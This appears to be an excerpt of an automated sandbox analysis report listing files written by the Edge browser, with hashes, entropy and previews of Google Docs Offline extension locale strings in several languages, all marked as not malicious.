                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2846
                                                                                                                                                                                                                                                Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                                Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):963
                                                                                                                                                                                                                                                Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1320
                                                                                                                                                                                                                                                Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):884
                                                                                                                                                                                                                                                Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):980
                                                                                                                                                                                                                                                Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1941
